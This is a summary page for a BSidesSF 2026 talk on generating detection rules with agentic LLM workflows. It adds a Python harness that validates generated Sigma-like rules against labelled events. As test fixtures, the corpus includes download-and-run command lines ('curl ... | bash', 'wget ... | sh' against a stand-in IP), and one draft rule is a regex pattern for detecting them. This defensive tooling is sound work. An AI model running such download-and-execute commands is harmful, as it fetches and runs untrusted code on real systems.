Detection Allegro: Composing Detection Rules with Agentic Workflows
Raphael Ruban, Chen Cao
BSidesSF 2026 · Day 2 · AMC Theatre 13
Developing, deploying, and maintaining robust threat detection rules quickly is a core capability for any detection team. This talk, "Detection Allegro: Composing Detection Rules with Agentic Workflows," presented by Raphael Ruban and Chen Cao from Vacasa, describes an approach that uses **agentic workflows** and **artificial intelligence (AI)** to streamline that process. The core claim is that it cuts the time spent on detection development and maintenance by over 80%, turning what is often a tedious and error-prone manual task into an automated workflow.
AI review
Competent, production-grounded talk about using LLM-backed agentic workflows to automate detection rule generation and maintenance. The Vacasa team is clearly doing real work — the Athena skill, Linear integration, and vector DB for internal log coverage show genuine engineering effort — but the underlying concept (LLM + tools + feedback loop generates code) is not novel, and the 80% efficiency claim is a single-team anecdote without rigorous baseline measurement.
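The piece of an "LLM + tools + feedback loop" workflow that decides whether a generated rule is safe to ship is the validation tool, so here is a minimal accept-or-iterate harness as an added example. This is not code from the talk or from Vacasa (their Athena skill, Linear integration and vector DB are not reproduced); the simplified Sigma-like rule shape, the field names, the constructed labelled events and the successive DRAFTS standing in for an LLM's output on each round are all assumptions. A candidate rule is linted, run over labelled events, and either accepted or handed back with its misses and false alarms as the feedback for the next round.

```python
"""Accept-or-iterate harness for machine-generated detection rules.

Added example, not code from the talk or from Vacasa. Assumed: rules use a
simplified Sigma-like shape (selection keys are ANDed, list values ORed,
modifiers |contains and |re), and events are flat dicts.
"""
import re

# Constructed labelled events (not real telemetry): (event, is_malicious).
# Target behaviour: a download piped straight into a shell.
LABELLED_EVENTS = [
    ({"Image": "/usr/bin/bash",
      "CommandLine": "bash -c 'curl -s http://203.0.113.5/a.sh | bash'"}, True),
    ({"Image": "/bin/sh",
      "CommandLine": "sh -c 'wget -qO- http://203.0.113.5/b.sh | sh'"}, True),
    ({"Image": "/usr/bin/bash",
      "CommandLine": "bash -c 'curl -s https://api.example/v1 | jq .id'"}, False),
    ({"Image": "/usr/bin/bash", "CommandLine": "bash ./deploy.sh"}, False),
    ({"Image": "/usr/bin/python3", "CommandLine": "python3 -m http.server"}, False),
]

# Hypothetical successive drafts, standing in for an LLM's output per round.
DRAFTS = [
    {"title": "Draft 1: any curl",
     "logsource": {"product": "linux", "category": "process_creation"},
     "detection": {"selection": {"CommandLine|contains": "curl"}}},
    {"title": "Draft 2: download piped to shell",
     "logsource": {"product": "linux", "category": "process_creation"},
     "detection": {"selection": {
         "CommandLine|contains": ["curl", "wget"],
         "CommandLine|re": r"\|\s*(ba)?sh\b"}}},
]


def lint(rule):
    """Structural checks on generator output before it touches any data."""
    problems = []
    for key in ("title", "logsource", "detection"):
        if key not in rule:
            problems.append(f"missing top-level key: {key}")
    selection = rule.get("detection", {}).get("selection")
    if not isinstance(selection, dict) or not selection:
        problems.append("detection.selection must be a non-empty mapping")
        return problems
    for key, patterns in selection.items():
        _, _, modifier = key.partition("|")
        if modifier not in ("", "contains", "re"):
            problems.append(f"unsupported modifier in {key!r}")
        if modifier == "re":
            for p in patterns if isinstance(patterns, list) else [patterns]:
                try:
                    re.compile(p)
                except re.error as exc:
                    problems.append(f"bad regex {p!r}: {exc}")
    return problems


def _field_matches(value, patterns, modifier):
    if value is None:
        return False
    value = str(value)
    for p in patterns if isinstance(patterns, list) else [patterns]:
        if modifier == "contains" and p in value:
            return True
        if modifier == "re" and re.search(p, value):
            return True
        if modifier == "" and p == value:
            return True
    return False


def matches(rule, event):
    """Every selection key must match (AND); a list of patterns is OR."""
    for key, patterns in rule["detection"]["selection"].items():
        field, _, modifier = key.partition("|")
        if not _field_matches(event.get(field), patterns, modifier):
            return False
    return True


def evaluate(rule, labelled):
    """Run a rule over labelled events; the misses are the agent's feedback."""
    fn = [ev for ev, mal in labelled if mal and not matches(rule, ev)]
    fp = [ev for ev, mal in labelled if not mal and matches(rule, ev)]
    return {"false_negatives": fn, "false_positives": fp,
            "accepted": not fn and not fp}


def refine(candidates, labelled, max_rounds=5):
    """Accept-or-iterate loop. Returns (accepted rule or None, history).

    Each history entry is (title, accepted, notes); the notes are what would
    be fed back to the generator for the next draft.
    """
    history = []
    for rnd, rule in enumerate(candidates):
        if rnd >= max_rounds:
            break
        problems = lint(rule)
        if problems:
            history.append((rule.get("title", "?"), False, problems))
            continue
        result = evaluate(rule, labelled)
        notes = [f"missed: {ev['CommandLine']}" for ev in result["false_negatives"]]
        notes += [f"false alarm: {ev['CommandLine']}" for ev in result["false_positives"]]
        history.append((rule["title"], result["accepted"], notes))
        if result["accepted"]:
            return rule, history
    return None, history


if __name__ == "__main__":
    accepted, history = refine(DRAFTS, LABELLED_EVENTS)
    for title, ok, notes in history:
        print(("ACCEPT " if ok else "RETRY  ") + title)
        for note in notes:
            print("    " + note)
    print("deployable:", accepted["title"] if accepted else None)
```

The lint step matters because a generator's output is untrusted input: a malformed selection or an uncompilable regex should bounce back to the agent, not reach the rule evaluator or the SIEM. The labelled corpus is what makes the 80% claim measurable for your own team, since every accepted rule carries a record of exactly which samples it was required to catch and to ignore.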